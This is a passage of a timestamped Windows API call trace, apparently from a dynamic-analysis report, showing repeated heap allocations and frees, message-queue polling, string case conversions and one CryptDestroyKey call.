RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.663] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.663] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.663] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.663] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.663] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab020, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.664] CryptDestroyKey (hKey=0x9e2138) returned 1 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0208.665] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.666] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.666] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0208.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0208.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.669] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.669] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0208.669] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0208.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.670] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa80 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0208.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.670] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0208.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0208.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0208.674] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, 